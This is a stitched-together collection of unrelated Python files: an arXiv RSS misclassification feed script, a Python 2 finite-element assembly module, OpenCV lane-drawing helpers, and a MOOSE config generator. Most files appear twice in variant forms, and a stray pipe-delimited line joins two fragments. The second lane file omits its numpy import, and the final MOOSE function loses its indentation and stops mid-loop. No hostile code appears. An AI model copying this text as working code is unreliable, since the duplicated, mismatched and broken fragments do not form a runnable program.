def harvest_since_last_modification():
    """Re-harvest arXiv OAI records into ./data since the feed's last build.

    The mtime of feed/feed.xml is the low-water mark; if the feed does not
    exist yet, today's date is used instead.
    """
    try:
        date = datetime.fromtimestamp(os.stat("feed/feed.xml").st_mtime)
    except OSError:
        log.exception("Got OSError when trying to stat feed file:")
        # NOTE(review): falling back to *today* harvests almost nothing on a
        # first run — presumably intentional; confirm.
        date = datetime.today()
    date = date.strftime("%Y-%m-%d")
    log.info("Harvesting since %s", date)
    # shell=True is required for the && pipeline; `date` is generated locally,
    # not user-controlled input.
    subprocess.run(
        f"rm -rf data && mkdir data && cd data && oai-harvest 'http://export.arxiv.org/oai2' --from {date} -p arXiv",
        check=True,
        shell=True,
    )
def iter_load_entries_from_xml():
    """Yield one metadata dict per harvested XML record under ``data/``.

    Each dict carries abstract/authors/categories/id/title plus a derived
    ``link``; records missing any required field are logged and skipped.
    """
    wanted = ("abstract", "authors", "categories", "id", "title")
    for path in glob("data/*.xml"):
        record = {}
        for element in ET.parse(path).getroot():
            for key in wanted:
                if element.tag.endswith(key):
                    record[key] = el_text(element)
        if any(key not in record for key in wanted):  # Sanity check: valid entry
            log.warning(
                "File %s is not complete, contains keys: %s", path, list(record.keys())
            )
        else:
            record["link"] = f"https://arxiv.org/abs/{record['id']}"
            yield record
def el_text(el):
    """Text content of *el*; author elements yield a ``" - "``-joined name list."""
    if el.tag.endswith("authors"):
        return " - ".join(author_names_text(el))
    return el.text.strip()
def author_names_text(el):
    """Yield each author's full name, space-joining all of its name parts."""
    return (" ".join(author.itertext()) for author in el)
def single_line(s):
    """Collapse all whitespace runs (including newlines) into single spaces."""
    tokens = s.split()
    return " ".join(tokens)
def load_model():
    """Load the fine-tuned RoBERTa classifier from ./outputs, CPU-only."""
    from simpletransformers.classification import ClassificationModel
    # Hide all GPUs so the model is forced onto the CPU.
    os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
    log.debug("Loading ClassificationModel")
    return ClassificationModel(
        "roberta",
        "outputs/",
        use_cuda=False,
        args={"train_batch_size": 64, "eval_batch_size": 64, "process_count": 8},
    )
if __name__ == "__main__":
main() | fetch.py | import logging
import os
import subprocess
import xml.etree.ElementTree as ET
from datetime import datetime
from glob import glob
import feedgenerator
import requests
from scipy.special import softmax
logging.basicConfig()
log = logging.getLogger(__name__)
def main():
    """Harvest, classify, and publish the two misclassification RSS feeds."""
    harvest_since_last_modification()
    entries = list(iter_load_entries_from_xml())
    if not entries:
        log.error("No new entries, is it the weekend?")
        return
    # One classifier input per record: title + abstract on one line.
    texts = [
        single_line(entry["title"] + " abstract: " + entry["abstract"])
        for entry in entries
    ]
    model = load_model()
    entries = (
        *model.predict(texts),
        texts,
        entries,
    )  # prediction label, score, arxiv text, arxiv label
    feed = feedgenerator.Rss201rev2Feed(
        title="arXiv misclassified: all",
        link="http://export.arxiv.org/rss/",
        description="Papers from arXiv that should be classifed cs.SE according to our model.",
        language="en",
    )
    sub_categories = ("cs.AI", "cs.LG", "stat.ML")
    sub_categories_str = " ".join(sub_categories)
    feed_sub = feedgenerator.Rss201rev2Feed(
        title="arXiv misclassified: " + sub_categories_str,
        link="http://export.arxiv.org/rss/",
        description="Papers from "
        + sub_categories_str
        + " that should be classifed cs.SE according to our model.",
        language="en",
    )
    for pred, score, text, entry in zip(*entries):
        label = entry["categories"]
        # Report only positives not already tagged cs.SE / cs.PL by arXiv.
        if pred and "cs.se" not in label.lower() and "cs.pl" not in label.lower():
            abs_link = entry["link"]
            abstract = entry["abstract"]
            authors = entry["authors"]
            pdf_link = abs_link.replace("/abs/", "/pdf/")
            score = softmax(score)
            title = entry["title"]
            # NOTE(review): no timeout; on success the whole abs-page HTML
            # becomes the item description — confirm this is intended.
            r = requests.get(abs_link)
            if r.ok:
                description = r.text
            else:
                description = f"""
            {abstract}
            <p>Authors: {authors}
            <p><a href="{pdf_link}">{pdf_link}</a>
            <p><a href="{abs_link}">{abs_link}</a>
            <p>Categories: {label}
            <p>score: {score[1]:.2f}
            """.strip()
            args = dict(
                title=title,
                link=pdf_link,
                description=description,
                unique_id=pdf_link,
                categories=label.split(),
            )
            feed.add_item(**args)
            if any(sub in label for sub in sub_categories):
                feed_sub.add_item(**args)
    os.makedirs("feed", exist_ok=True)
    with open("feed/feed.xml", "w") as f:
        print(feed.writeString("utf-8"), file=f)
    with open("feed/feed2.xml", "w") as f:
        print(feed_sub.writeString("utf-8"), file=f)
def harvest_since_last_modification():
    """Re-harvest arXiv OAI records into ./data since feed/feed.xml's mtime."""
    try:
        date = datetime.fromtimestamp(os.stat("feed/feed.xml").st_mtime)
    except OSError:
        log.exception("Got OSError when trying to stat feed file:")
        # Fallback when the feed does not exist yet: harvest from today only.
        date = datetime.today()
    date = date.strftime("%Y-%m-%d")
    log.info("Harvesting since %s", date)
    # shell=True is required for the && pipeline; `date` is locally generated.
    subprocess.run(
        f"rm -rf data && mkdir data && cd data && oai-harvest 'http://export.arxiv.org/oai2' --from {date} -p arXiv",
        check=True,
        shell=True,
    )
def iter_load_entries_from_xml():
    """Yield one complete metadata dict (plus derived link) per XML in ./data."""
    tags = ("abstract", "authors", "categories", "id", "title")
    for fname in glob("data/*.xml"):
        root = ET.parse(fname).getroot()
        d = {}
        for el in root:
            tag = el.tag
            # Match by suffix so namespaced tags still resolve.
            for wanted_tag in tags:
                if tag.endswith(wanted_tag):
                    d[wanted_tag] = el_text(el)
        if all(tag in d for tag in tags):  # Sanity check: valid entry
            d["link"] = f"https://arxiv.org/abs/{d['id']}"
            yield d
        else:
            log.warning(
                "File %s is not complete, contains keys: %s", fname, list(d.keys())
            )
def el_text(el):
    """Stripped text of *el*, except authors, which become a joined name list."""
    if not el.tag.endswith("authors"):
        return el.text.strip()
    return " - ".join(author_names_text(el))
def author_names_text(el):
    """Yield each child author's full name (all name-part texts, space-joined)."""
    for child in el:
        yield " ".join(child.itertext())
def single_line(s):
    """Collapse all whitespace runs in *s* into single spaces."""
    return " ".join(s.split())
def load_model():
    """Load the fine-tuned RoBERTa classifier from ./outputs, forcing CPU."""
    from simpletransformers.classification import ClassificationModel
    # Hide all GPUs so the model runs on CPU.
    os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
    log.debug("Loading ClassificationModel")
    return ClassificationModel(
        "roberta",
        "outputs/",
        use_cuda=False,
        args={"train_batch_size": 64, "eval_batch_size": 64, "process_count": 8},
    )
if __name__ == "__main__":
    main()
import numpy
from pypyr.mesh import Basis, ElementFinder, ElementQuadrature, BoundaryQuadrature
import itertools as it
from pypyr.timing import *
def processIndices(basis, boundarytags):
    """ Split a basis's degrees of freedom into boundary and internal sets.
        returns:
            I: sparse map from each element's local dofs to their global indices
            boundaries: dict of tag -> DegreeSet for each requested boundary
            internalidx: global dof ids that lie on no requested boundary
    """
    import scipy.sparse as ss
    indices = basis.getIndices()
    ndofs = basis.elementfactory.index  # = max(indices)+1
    # One (local, global) unit entry per local dof, assembled as CSR.
    localtoglobal = ss.csr_matrix(
        (numpy.ones_like(indices), indices, range(0, len(indices) + 1)))
    isinternal = numpy.ones(ndofs, dtype=bool)
    boundaries = {}
    for tag in boundarytags:
        degrees = basis.getBoundary(tag)
        boundaries[tag] = degrees
        if degrees:
            isinternal[degrees.indices] = False
    return localtoglobal, boundaries, numpy.nonzero(isinternal)[0]
def blockInnerProducts(quadweights, leftvalsiter, rightvalsiter, leftI, rightI):
    """ Evaluate the inner product matrix
        returns a sparse matrix equal to leftI.transpose * L.transpose * quadweights * R * rightI
        where L and R are block diagonal matrices whose blocks are given by the iterables, leftvalsiter and rightvalsiter
        If the left or right vals have more than 2 dimensions, the extra dimensions are multiplied and summed (tensor-contracted),
        with broadcasting as necessary, i.e. this is an inner-product - it can't be used for a more general multiplication
    """
    import scipy.sparse as ss
    data = []   # one dense block per element with quadrature points
    idx = []    # block column index (element number) for each block
    ip = [0]    # BSR row pointer, one row per element
    # NOTE: it.izip and the list+range concatenation below are Python-2-only.
    for e, (leftvals, rightvals, weights) in enumerate(it.izip(leftvalsiter, rightvalsiter, quadweights)):
        if len(weights):
            lvs = len(leftvals.shape)
            rvs = len(rightvals.shape)
            vs = max(lvs,rvs)
            # Pad trailing singleton axes so both operands have rank vs.
            leftvals = leftvals.reshape(leftvals.shape + (1,)*(vs - lvs))
            rightvals = rightvals.reshape(rightvals.shape + (1,)*(vs - rvs))
            # Fold the quadrature weights into the left factor (axis 0 = points).
            lvw = leftvals * weights.reshape((-1,) + (1,)*(vs-1))
            # print lvw.shape, rightvals.shape
            # Contract over quadrature points (axis 0) and all extra axes >= 2.
            data.append(numpy.tensordot(lvw, rightvals, ([0]+range(2,vs), [0]+range(2,vs))))
            idx.append(e)
        ip.append(len(idx))
    # print e, idx, ip
    V = ss.bsr_matrix((data, idx, ip),dtype=float, shape=(leftI.shape[0],rightI.shape[0]))
    return leftI.transpose() * V * rightI
class System(object):
    """ A System contains everything that's needed to construct stiffness matrices and load vectors.
        This is an abstract-ish class; see SymmetricSystem and AsymmetricSystem for concrete implementations.
        Parameters:
            quadrule: a tuple of quadrature points and weights on the reference pyramid
            meshevents: A function that produces mesh events
            leftbasis, rightbasis: see pypyr.mesh.Basis
            leftindexinfo, rightindexinfo: see processIndices
        NOTE: this module is Python 2 code (iteritems / it.imap below).
    """
    def __init__(self, quadrule, meshevents, leftbasis, rightbasis, leftindexinfo, rightindexinfo):
        # Replaying the mesh events populates each helper object.
        self.elementfinder = meshevents(ElementFinder())
        self.elementinfo = meshevents(ElementQuadrature())
        self.boundaryquad = meshevents(BoundaryQuadrature())
        self.refquadpoints, refweights = quadrule
        # Per-element quadrature weights mapped onto the physical elements.
        self.quadweights = list(self.elementinfo.getWeights(self.refquadpoints, refweights))
        self.leftbasis = leftbasis
        self.rightbasis = rightbasis
        self.leftI, self.leftbdys, self.leftintidx = leftindexinfo
        self.rightI, self.rightbdys, self.rightintidx = rightindexinfo
    def _transposeinplace(self):
        """ Transpose this object (swap the left/test and right/trial data) """
        self.leftbasis, self.rightbasis = self.rightbasis, self.leftbasis
        self.leftI, self.rightI = self.rightI, self.leftI
        self.leftbdys, self.rightbdys = self.rightbdys, self.leftbdys
        self.leftintidx, self.rightintidx = self.rightintidx, self.leftintidx
        return self
    def processSystem(self, leftvalsiter, rightvalsiter):
        """ Construct the (non-boundary aware) stiffness matrix """
        return blockInnerProducts(self.quadweights, leftvalsiter, rightvalsiter, self.leftI, self.rightI)
    def processBoundary(self, sysmat, tagtog):
        """ Split the stiffness matrix into the internal and external parts. Evaluate boundary data
            sysmat: system matrix (which will come from processSystem()).
            tagtog: dictionary of functions to evaluate on the boundar(y|ies)
            returns:
                internalSystem: S[I,I] where I is the internal degrees
                tagtoBoundarySystem: tag->S[I,E[tag]] where E[tag] gives the indices of the external degrees
                tagtogvals: g[tag] evaluated at the degrees of freedom associated with boundary "tag".
            Somewhat inefficient if there's a significant proportion of dofs on the boundary """
        SI = sysmat[self.leftintidx, :]
        internalSystem = SI[:,self.rightintidx]
        tagtogvals = {}
        tagtoBoundarySystem = {}
        for tag, bdy in self.rightbdys.iteritems():
            tagtogvals[tag] = bdy.evaluatedofs(tagtog[tag])
            tagtoBoundarySystem[tag] = SI[:,bdy.indices]
        return internalSystem, tagtoBoundarySystem, tagtogvals
    def loadVector(self, f, deriv=False):
        """ Calculate the load vector for the internal shape functions """
        testvalsiter = self.leftbasis.getElementValues(self.refquadpoints, deriv)
        fvalsiter = it.imap(f, self.elementinfo.getQuadPoints(self.refquadpoints))
        # The all-ones right map treats f as a single global "function" column.
        return blockInnerProducts(self.quadweights, testvalsiter, fvalsiter, self.leftI, numpy.ones((self.elementinfo.numElements(), 1)))[self.leftintidx,:]
    def boundaryLoad(self, tagtog, squarequad, trianglequad, deriv=False):
        """ Calculate the load vector based on a boundary integral, e.g. for Dirichlet data in the dual formulation of the mixed laplacian"""
        tagtogsys = {}
        for tag, g in tagtog.iteritems():
            x,w,n = zip(*self.boundaryquad.getQuadratures(tag, squarequad, trianglequad))
            # print map(g,x,n)
            # print map(lambda e,p: 0 if len(p) is 0 else e.values(p), self.leftbasis.elements, x)
            fvalsiter = it.imap(g, x, n)
            # NOTE(review): `len(p) is 0` relies on small-int identity; should be ==.
            testvalsiter = it.imap(lambda e,p: 0 if len(p) is 0 else e.values(p), self.leftbasis.elements, x)
            tagtogsys[tag] = blockInnerProducts(w, testvalsiter, fvalsiter, self.leftI, numpy.ones((self.elementinfo.numElements(), 1)))[self.leftintidx,:]
        return tagtogsys
    def evaluate(self, points, U, tagtoG = {}, deriv=False):
        """ Evaluate a solution given by the coefficients of the internal degrees, U, at specified points.
            tagtoG should be the coefficients for the external degrees
            NOTE(review): tagtoG's mutable default is safe only because it is never mutated here.
        """
        # Assemble the full (internal + boundary) coefficient vector.
        UG = numpy.zeros(self.rightbasis.elementfactory.index)
        UG[self.rightintidx] = U
        for tag, G in tagtoG.iteritems():
            UG[self.rightbdys[tag].indices] = G
        etop = self.elementfinder.elementPointMap(points)
        UGvals = numpy.zeros((len(points), self.rightbasis.elements[0].ncpts))
        for e, pids in zip(self.rightbasis.elements, etop):
            if len(pids):
                evals = e.derivs(points[pids]) if deriv else e.values(points[pids])
                # Accumulate each element's contribution at its own points.
                UGvals[pids] += numpy.tensordot(evals, UG[e.indices], ([1],[0]))
        return UGvals
class SymmetricSystem(System):
    """ A symmetric system: test and trial spaces share one basis, so the
        index information is computed once and used for both sides. """
    def __init__(self, elements, quadrule, meshevents, boundarytags):
        self.basis = Basis(elements)
        meshevents(self.basis)
        indexinfo = processIndices(self.basis, boundarytags)
        System.__init__(self, quadrule, meshevents, self.basis, self.basis, indexinfo, indexinfo)
        self.elements = elements
    def systemMatrix(self, deriv):
        # tee() duplicates the single value iterator for the left/right factors.
        return super(SymmetricSystem, self).processSystem(*it.tee(self.basis.getElementValues(self.refquadpoints,deriv), 2))
class AsymmetricSystem(System):
    """ An Asymmetric system: distinct test (left) and trial (right) spaces. """
    def __init__(self, leftelements, rightelements, quadrule, meshevents, leftboundarytags, rightboundarytags):
        leftbasis = Basis(leftelements)
        rightbasis = Basis(rightelements)
        meshevents(leftbasis)
        meshevents(rightbasis)
        super(AsymmetricSystem, self).__init__(
            quadrule, meshevents, leftbasis, rightbasis,
            processIndices(leftbasis, leftboundarytags),
            processIndices(rightbasis, rightboundarytags))
    def systemMatrix(self, leftderiv, rightderiv):
        """ Assemble the stiffness matrix, differentiating either side on request """
        return super(AsymmetricSystem, self).processSystem(
            self.leftbasis.getElementValues(self.refquadpoints, leftderiv),
            self.rightbasis.getElementValues(self.refquadpoints, rightderiv))
    def transpose(self):
        """ Return a shallow-copied, transposed view of this system """
        import copy
        return copy.copy(self)._transposeinplace()
from pypyr.mesh import Basis, ElementFinder, ElementQuadrature, BoundaryQuadrature
import itertools as it
from pypyr.timing import *
def processIndices(basis, boundarytags):
    """ Given a basis (a collection of elements) and a set of boundaries, extract the internal and external degrees of freedom
        returns:
            I: a sparse matrix that maps the local degrees of freedom for each element to their global indices
            boundaries: a map of tag->DegreeSet, which can be used to evaluate all the degrees on each boundary
            internalidx: ids of the internal degrees of freedom
    """
    import scipy.sparse as ss
    indices = basis.getIndices()
    n = basis.elementfactory.index # = max(indices)+1
    # One unit entry per local dof; CSR with one row per local dof.
    I = ss.csr_matrix((numpy.ones_like(indices), indices, range(0,len(indices)+1)))
    idxflag = numpy.ones(n, dtype=bool)
    boundaries = {}
    for tag in boundarytags:
        bdy = basis.getBoundary(tag)
        boundaries[tag] = bdy
        # Mark every dof on this boundary as external.
        if bdy: idxflag[bdy.indices] = False
    internalidx = numpy.nonzero(idxflag)[0]
    return I, boundaries, internalidx
def blockInnerProducts(quadweights, leftvalsiter, rightvalsiter, leftI, rightI):
    """ Evaluate the inner product matrix
        returns a sparse matrix equal to leftI.transpose * L.transpose * quadweights * R * rightI
        where L and R are block diagonal matrices whose blocks are given by the iterables, leftvalsiter and rightvalsiter
        If the left or right vals have more than 2 dimensions, the extra dimensions are multiplied and summed (tensor-contracted),
        with broadcasting as necessary, i.e. this is an inner-product - it can't be used for a more general multiplication
        NOTE: Python-2-only (it.izip, list+range concatenation).
    """
    import scipy.sparse as ss
    data = []
    idx = []
    ip = [0]
    for e, (leftvals, rightvals, weights) in enumerate(it.izip(leftvalsiter, rightvalsiter, quadweights)):
        if len(weights):
            lvs = len(leftvals.shape)
            rvs = len(rightvals.shape)
            vs = max(lvs,rvs)
            # Pad trailing singleton axes so both operands have rank vs.
            leftvals = leftvals.reshape(leftvals.shape + (1,)*(vs - lvs))
            rightvals = rightvals.reshape(rightvals.shape + (1,)*(vs - rvs))
            # Fold the quadrature weights into the left factor.
            lvw = leftvals * weights.reshape((-1,) + (1,)*(vs-1))
            # print lvw.shape, rightvals.shape
            data.append(numpy.tensordot(lvw, rightvals, ([0]+range(2,vs), [0]+range(2,vs))))
            idx.append(e)
        ip.append(len(idx))
    # print e, idx, ip
    V = ss.bsr_matrix((data, idx, ip),dtype=float, shape=(leftI.shape[0],rightI.shape[0]))
    return leftI.transpose() * V * rightI
class System(object):
    """ A System contains everything that's needed to construct stiffness matrices and load vectors.
        This is an abstract-ish class; see SymmetricSystem and AsymmetricSystem for concrete implementations.
        Parameters:
            quadrule: a tuple of quadrature points and weights on the reference pyramid
            meshevents: A function that produces mesh events
            leftbasis, rightbasis: see pypyr.mesh.Basis
            leftindexinfo, rightindexinfo: see processIndices
    """
    def __init__(self, quadrule, meshevents, leftbasis, rightbasis, leftindexinfo, rightindexinfo):
        # Replaying mesh events populates each helper object.
        self.elementfinder = meshevents(ElementFinder())
        self.elementinfo = meshevents(ElementQuadrature())
        self.boundaryquad = meshevents(BoundaryQuadrature())
        self.refquadpoints, refweights = quadrule
        self.quadweights = list(self.elementinfo.getWeights(self.refquadpoints, refweights))
        self.leftbasis = leftbasis
        self.rightbasis = rightbasis
        self.leftI, self.leftbdys, self.leftintidx = leftindexinfo
        self.rightI, self.rightbdys, self.rightintidx = rightindexinfo
    def _transposeinplace(self):
        """ Transpose this object (swap left/right data in place) """
        self.leftbasis, self.rightbasis = self.rightbasis, self.leftbasis
        self.leftI, self.rightI = self.rightI, self.leftI
        self.leftbdys, self.rightbdys = self.rightbdys, self.leftbdys
        self.leftintidx, self.rightintidx = self.rightintidx, self.leftintidx
        return self
    def processSystem(self, leftvalsiter, rightvalsiter):
        """ Construct the (non-boundary aware) stiffness matrix """
        return blockInnerProducts(self.quadweights, leftvalsiter, rightvalsiter, self.leftI, self.rightI)
    def processBoundary(self, sysmat, tagtog):
        """ Split the stiffness matrix into the internal and external parts. Evaluate boundary data
            sysmat: system matrix (which will come from processSystem()).
            tagtog: dictionary of functions to evaluate on the boundar(y|ies)
            returns:
                internalSystem: S[I,I] where I is the internal degrees
                tagtoBoundarySystem: tag->S[I,E[tag]] where E[tag] gives the indices of the external degrees
                tagtogvals: g[tag] evaluated at the degrees of freedom associated with boundary "tag".
            Somewhat inefficient if there's a significant proportion of dofs on the boundary """
        SI = sysmat[self.leftintidx, :]
        internalSystem = SI[:,self.rightintidx]
        tagtogvals = {}
        tagtoBoundarySystem = {}
        for tag, bdy in self.rightbdys.iteritems():
            tagtogvals[tag] = bdy.evaluatedofs(tagtog[tag])
            tagtoBoundarySystem[tag] = SI[:,bdy.indices]
        return internalSystem, tagtoBoundarySystem, tagtogvals
    def loadVector(self, f, deriv=False):
        """ Calculate the load vector for the internal shape functions """
        testvalsiter = self.leftbasis.getElementValues(self.refquadpoints, deriv)
        fvalsiter = it.imap(f, self.elementinfo.getQuadPoints(self.refquadpoints))
        return blockInnerProducts(self.quadweights, testvalsiter, fvalsiter, self.leftI, numpy.ones((self.elementinfo.numElements(), 1)))[self.leftintidx,:]
    def boundaryLoad(self, tagtog, squarequad, trianglequad, deriv=False):
        """ Calculate the load vector based on a boundary integral, e.g. for Dirichlet data in the dual formulation of the mixed laplacian"""
        tagtogsys = {}
        for tag, g in tagtog.iteritems():
            x,w,n = zip(*self.boundaryquad.getQuadratures(tag, squarequad, trianglequad))
            # print map(g,x,n)
            # print map(lambda e,p: 0 if len(p) is 0 else e.values(p), self.leftbasis.elements, x)
            fvalsiter = it.imap(g, x, n)
            testvalsiter = it.imap(lambda e,p: 0 if len(p) is 0 else e.values(p), self.leftbasis.elements, x)
            tagtogsys[tag] = blockInnerProducts(w, testvalsiter, fvalsiter, self.leftI, numpy.ones((self.elementinfo.numElements(), 1)))[self.leftintidx,:]
        return tagtogsys
    def evaluate(self, points, U, tagtoG = {}, deriv=False):
        """ Evaluate a solution given by the coefficients of the internal degrees, U, at specified points.
            tagtoG should be the coefficients for the external degrees """
        # Full coefficient vector: internal values plus boundary values per tag.
        UG = numpy.zeros(self.rightbasis.elementfactory.index)
        UG[self.rightintidx] = U
        for tag, G in tagtoG.iteritems():
            UG[self.rightbdys[tag].indices] = G
        etop = self.elementfinder.elementPointMap(points)
        UGvals = numpy.zeros((len(points), self.rightbasis.elements[0].ncpts))
        for e, pids in zip(self.rightbasis.elements, etop):
            if len(pids):
                evals = e.derivs(points[pids]) if deriv else e.values(points[pids])
                UGvals[pids] += numpy.tensordot(evals, UG[e.indices], ([1],[0]))
        return UGvals
class SymmetricSystem(System):
    """ A symmetric system (one shared basis for test and trial spaces) """
    def __init__(self, elements, quadrule, meshevents, boundarytags):
        self.basis = Basis(elements)
        meshevents(self.basis)
        indexinfo = processIndices(self.basis, boundarytags)
        System.__init__(self, quadrule, meshevents, self.basis, self.basis, indexinfo, indexinfo)
        self.elements = elements
    def systemMatrix(self, deriv):
        # Duplicate the value iterator so it can feed both matrix factors.
        return super(SymmetricSystem, self).processSystem(*it.tee(self.basis.getElementValues(self.refquadpoints,deriv), 2))
class AsymmetricSystem(System):
    """ An Asymmetric system with independent test and trial bases """
    def __init__(self, leftelements, rightelements, quadrule, meshevents, leftboundarytags, rightboundarytags):
        testbasis = Basis(leftelements)
        trialbasis = Basis(rightelements)
        meshevents(testbasis)
        meshevents(trialbasis)
        super(AsymmetricSystem, self).__init__(
            quadrule, meshevents, testbasis, trialbasis,
            processIndices(testbasis, leftboundarytags),
            processIndices(trialbasis, rightboundarytags))
    def systemMatrix(self, leftderiv, rightderiv):
        """ Assemble the stiffness matrix from the two bases' element values """
        leftvals = self.leftbasis.getElementValues(self.refquadpoints, leftderiv)
        rightvals = self.rightbasis.getElementValues(self.refquadpoints, rightderiv)
        return super(AsymmetricSystem, self).processSystem(leftvals, rightvals)
    def transpose(self):
        """ Shallow-copy this system and transpose the copy """
        import copy
        duplicate = copy.copy(self)
        return duplicate._transposeinplace()
import numpy as np
import cv2
import lines
def draw_lane(img, warped_img, left_points, right_points, Minv):
    """Paint the detected lane polygon back onto the original (unwarped) image.

    left_points/right_points are (x_values, y_values) pairs in warped space;
    Minv is the inverse perspective transform. Returns the blended image.
    """
    # Blank 3-channel canvas, same size as the warped image
    channel = np.zeros_like(warped_img).astype(np.uint8)
    canvas = np.dstack((channel, channel, channel))
    # Recast the x and y points into usable format for cv2.fillPoly()
    left_x, plot_y = left_points[0], left_points[1]
    right_x = right_points[0]
    # Left edge top-to-bottom, right edge reversed -> one closed polygon
    left_edge = np.array([np.transpose(np.vstack([left_x, plot_y]))])
    right_edge = np.array([np.flipud(np.transpose(np.vstack([right_x, plot_y])))])
    polygon = np.hstack((left_edge, right_edge))
    # Fill the lane area in green on the warped canvas
    cv2.fillPoly(canvas, np.int_([polygon]), (0, 255, 0))
    # Back to camera perspective, then alpha-blend over the source frame
    unwarped = cv2.warpPerspective(canvas, Minv, (img.shape[1], img.shape[0]))
    return cv2.addWeighted(img, 1, unwarped, 0.3, 0)
def add_metrics(img, leftx, rightx, xm_per_pix=3.7/800, ym_per_pix = 25/720):
    """Overlay curvature radii and the horizontal car offset as text on *img*."""
    # Radii of curvature (metres) for the left and right lane lines
    radii = lines.curvature_radius(leftx=leftx, rightx=rightx, img_shape=img.shape,
                                   xm_per_pix=xm_per_pix, ym_per_pix=ym_per_pix)
    # Lateral offset of the car from the lane centre (metres)
    offsetx = lines.car_offset(leftx=leftx, rightx=rightx, img_shape=img.shape)
    annotated = img.copy()
    labels = [
        ('Left lane line curvature: {:.2f} m'.format(radii[0]), (60, 60)),
        ('Right lane line curvature: {:.2f} m'.format(radii[1]), (60, 110)),
        ('Horizontal car offset: {:.2f} m'.format(offsetx), (60, 160)),
    ]
    for text, origin in labels:
        cv2.putText(annotated, text, origin, cv2.FONT_HERSHEY_SIMPLEX, 1.5,
                    (255, 255, 255), 5)
    return annotated
import cv2
import lines
def draw_lane(img, warped_img, left_points, right_points, Minv):
    """Project the lane polygon from warped space back onto *img*, blended green."""
    # Create an image to draw the lines on
    warp_zero = np.zeros_like(warped_img).astype(np.uint8)
    color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
    # Recast the x and y points into usable format for cv2.fillPoly()
    left_fitx = left_points[0]
    right_fitx = right_points[0]
    ploty = left_points[1]
    pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])
    # Right edge reversed so the two polylines form one closed polygon
    pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])
    pts = np.hstack((pts_left, pts_right))
    # Draw the lane onto the warped blank image
    cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))
    # Warp the blank back to original image space using inverse perspective matrix (Minv)
    newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
    # Combine the result with the original image
    return cv2.addWeighted(img, 1, newwarp, 0.3, 0)
def add_metrics(img, leftx, rightx, xm_per_pix=3.7/800, ym_per_pix = 25/720):
    """Annotate *img* with lane-curvature radii and the car's lateral offset."""
    out = img.copy()
    # Per-line curvature radii in metres
    curvature = lines.curvature_radius(leftx=leftx, rightx=rightx, img_shape=img.shape,
                                       xm_per_pix=xm_per_pix, ym_per_pix=ym_per_pix)
    # Horizontal distance of the car from the lane centre, in metres
    offsetx = lines.car_offset(leftx=leftx, rightx=rightx, img_shape=img.shape)
    cv2.putText(out, 'Left lane line curvature: {:.2f} m'.format(curvature[0]),
                (60, 60), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255, 255, 255), 5)
    cv2.putText(out, 'Right lane line curvature: {:.2f} m'.format(curvature[1]),
                (60, 110), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255, 255, 255), 5)
    cv2.putText(out, 'Horizontal car offset: {:.2f} m'.format(offsetx),
                (60, 160), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255, 255, 255), 5)
    return out
import os
import logging
import argparse
import configparser
import pyhit
import moosetree
import utils
def getParserArguments():
    """
    Gets the arguments provided by the user via the command-line

    Return
        args: the arguments provided by the user and parsed by the Argument Parser
    """
    parser = argparse.ArgumentParser(
        prefix_chars='-',
        description='Provide a MOOSE input file (.i) to generate a configuration file',
        add_help=False)
    options = parser.add_argument_group(title='Options')
    options.add_argument('-i', metavar='<input_file>', dest='inputFile', nargs=1,
                         help='Specify a MOOSE input file')
    options.add_argument('-h', '--help', action='help', help='Displays CLI usage statement')
    # Tolerate (and ignore) any arguments this parser does not know about
    args = parser.parse_known_args()[0]
    if args.inputFile:
        # Reject anything that is not a MOOSE ".i" input file
        utils.validateExtension(".i", args.inputFile[0])
    return args
def getInputFilePath(args):
    """
    Resolve the input-file path from the CLI args or, failing that, the .env file

    Return
        inputFile (string): the file path to the input file
        isEnvVariable (bool): True when the path came from the environment
    """
    if args.inputFile is not None:
        # Command-line value wins; it did not come from the environment
        return args.inputFile[0], False
    import settings  # loads the .env file as a side effect
    return os.getenv("CONFIG_INPUT_FILE_NAME"), True
def getConfigFileName(inputFile: str = None):
    """
    Derive the config-file name: swap the input file's extension for ".cfg",
    or fall back to the CONFIG_FILE_NAME environment variable.

    Args
        inputFile (string): the path to use for the config filename (command-line only)
    Return
        configFile (string): the file path to the config file
    """
    if not inputFile:
        return os.getenv("CONFIG_FILE_NAME")
    stem = os.path.splitext(inputFile)[0]
    return stem + '.cfg'
def getParamsOfNode(node: moosetree.Node, root: moosetree.Node):
"""
Determine the parameters that can be modified which have a comment with '{{config}})'
Args
node (Node): a moosetree node
root (Node): the root moosetree node
Return
section (string): the full path of the node
paramDict (dictionary): dictionary of key, value pairs of the parameter name and the datatype
"""
# Get the key, value for the parameters of this node
nodeParameters = dict(node.params())
if root:
rootParameters = dict(root.params())
paramsDict = dict()
# Determine parameters with the comment {{config}} to add to the config file
for nodeKey, nodeValue in nodeParameters.items():
comment = node.comment(param=nodeKey)
if comment is not None:
if '{{config}}' in comment:
if isinstance(nodeValue, str):
# If value is a global variable at top of input file, use the datatype of the parameter from configDict
# Purpose: type('${xmax}') = str but should be int
if '${' in nodeValue:
modifiedValue = nodeValue.replace('${', '')
modifiedValue = modifiedValue.replace('}', '')
for rootKey, rootValue in rootParameters.items():
if rootKey == modifiedValue:
paramsDict[nodeKey] = type(rootValue).__name__
else:
paramsDict[nodeKey] = type(nodeValue).__name__
else:
paramsDict[nodeKey] = type(nodeValue).__name__
# Return sections and a dictionary of parameters
if len(paramsDict) != 0:
if node.fullpath:
section = node.fullpath
else:
section = 'root'
return section, paramsDict
def getConfigParameters(inputFile: str):
"""
Determine the section and parameters for the configuration file
Args
inputFile (string): the input file for pyhit to read
Return
configParams (dictionary): a dictionary of configuration parameters {section: dict(parameter name: datatype of value)}
"""
configParams = dict()
# Read the file
root = pyhit.load(inputFile)
# Get nodes
nodes = list(moosetree.iterate(root, method=moosetree.IterMethod.PRE_ORDER))
# For root node: Determine global variables with the comment {{config}} to add to the config file
section, paramsDict = getParamsOfNode(root, None) or (None, None)
if section and paramsDict:
configParams[section] = paramsDict
# For subsection nodes: Determine parameters with the comment {{config}} to add to the config file
for node in nodes:
